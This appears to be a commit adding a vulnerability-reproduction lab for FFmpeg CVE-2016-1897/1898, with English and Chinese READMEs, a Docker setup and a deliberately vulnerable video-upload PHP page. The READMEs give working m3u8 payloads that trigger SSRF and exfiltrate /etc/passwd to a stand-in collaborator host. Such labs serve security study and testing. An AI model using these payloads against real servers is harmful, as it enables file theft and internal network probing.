first commit

ffmpeg/CVE-2016-1897/README.md

@@ -0,0 +1,62 @@
+# FFmpeg Arbitrary File Read and SSRF (CVE-2016-1897/CVE-2016-1898)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+FFmpeg is a popular multimedia framework that can handle various audio and video formats. In the FFmpeg version prior to 2.8.5, 2.7.5, 2.6.7, 2.5.10, 2.4.13, two vulnerabilities were discovered that could allow attackers to read arbitrary files (CVE-2016-1897) or perform Server-Side Request Forgery (SSRF) attacks (CVE-2016-1898).
+
+References:
+
+- <https://tttang.com/archive/465/>
+- <http://habrahabr.ru/company/mailru/blog/274855/>
+- <http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/>
+
+## Environment Setup
+
+Execute the following commands to build and start the environment:
+
+```
+docker compose up -d
+```
+
+After the server starts, it will listen on port 8080. Visit `http://your-ip:8080/` to access the application, the application is a simple video player that allows users to upload and play videos.
+
+## Vulnerability Reproduction
+
+Upload the following poc to reproduce the SSRF vulnerability using collaborator server:
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:10.0,
+http://collaborator/ssrf
+#EXT-X-ENDLIST
+```
+
+As you can see, the collaborator server will receive the request:
+
+![](1.png)
+
+To reproduce the arbitrary file reading, you should serve a intermediate file on an accessible server (for example, `http://intermediate.example.com/intermediate.m3u8`) with following content:
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:,
+http://collaborator/fileread?
+```
+
+The content of the files you stole will be sent to the collaborator server specified in the intermediary file above.
+
+Then, use the intermediate file to construct the POC and upload it:
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:10.0,
+concat:http://intermediate.example.com/intermediate.m3u8|subfile,,start,0,end,31,,:file:///etc/passwd|subfile,,start,32,end,63,,:file:///etc/passwd|subfile,,start,64,end,95,,:file:///etc/passwd|subfile,,start,96,end,127,,:file:///etc/passwd|subfile,,start,127,end,158,,:file:///etc/passwd
+#EXT-X-ENDLIST
+```
+
+As you can see, the collaborator server will receive the request that contains the content of `/etc/passwd`:
+
+![](2.png)

ffmpeg/CVE-2016-1897/README.zh-cn.md

@@ -0,0 +1,59 @@
+# FFmpeg 任意文件读取和SSRF漏洞（CVE-2016-1897/CVE-2016-1898）
+
+FFmpeg是一个流行的多媒体框架，可以处理各种音频和视频格式。在FFmpeg中发现了两个漏洞，攻击者可以利用这些漏洞读取任意文件（CVE-2016-1897）或执行服务器端请求伪造（SSRF）攻击（CVE-2016-1898）。
+
+参考链接：
+
+- <https://tttang.com/archive/465/>
+- <http://habrahabr.ru/company/mailru/blog/274855/>
+- <http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/>
+
+## 环境搭建
+
+执行如下命令构建并启动环境：
+
+```
+docker compose up -d
+```
+
+启动后，服务将监听8080端口。访问`http://your-ip:8080/`即可访问应用，应用是一个简单的视频播放器，允许用户上传和播放视频。
+
+## 漏洞复现
+
+发送以下poc复现SSRF漏洞：
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:10.0,
+http://collaborator/ssrf
+```
+
+你将看到collaborator服务器收到请求：
+
+![](1.png)
+
+要复现任意文件读取漏洞，你需要在一个可控服务器（例如`http://intermediate.example.com/intermediate.m3u8`）中上传如下内容作为利用漏洞的中间文件：
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:,
+http://collaborator/fileread?
+```
+
+可见，这段m3u8文件中包含collaborator的URL，你窃取的文件内容将被发送至这个collaborator URL中。
+
+然后，使用这个中间文件来构造FFmpeg利用的POC并上传：
+
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:10.0,
+concat:http://intermediate.example.com/intermediate.m3u8|subfile,,start,0,end,31,,:file:///etc/passwd|subfile,,start,32,end,63,,:file:///etc/passwd|subfile,,start,64,end,95,,:file:///etc/passwd|subfile,,start,96,end,127,,:file:///etc/passwd|subfile,,start,127,end,158,,:file:///etc/passwd
+#EXT-X-ENDLIST
+```
+
+漏洞利用成功后，collaborator服务器收到请求，请求中包含`/etc/passwd`的内容：
+
+![](2.png)

ffmpeg/CVE-2016-1897/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/ffmpeg:2.8.4-with-php
+   command: php -S 0.0.0.0:8080 -t /var/www/html
+   volumes:
+    - ./www/index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ffmpeg/CVE-2016-1897/www/index.php

@@ -0,0 +1,26 @@
+<?php
+error_reporting(-1);
+ini_set('display_errors', 1);
+if(!empty($_FILES)) {
+    $filename = escapeshellarg($_FILES['file']['tmp_name']);
+    $newname = './' . uniqid() . '.mp4';
+    shell_exec("timeout -k 2s 10s ffmpeg -i $filename $newname");
+}
+?>
+<html>
+ <head>
+  <meta charset="utf-8">
+  <title>Video Player</title>
+ </head>
+ <body>
+     <?php if(!empty($_FILES)): ?>
+     <div>
+        <video src="<?=$newname?>" controls="controls" width="640" height="480"></video>
+     </div>
+     <?php endif; ?>
+     <form method="post" enctype="multipart/form-data">
+       <input type="file" name="file">
+       <input type="submit" value="Submit">
+     </form>
+ </body>
+</html>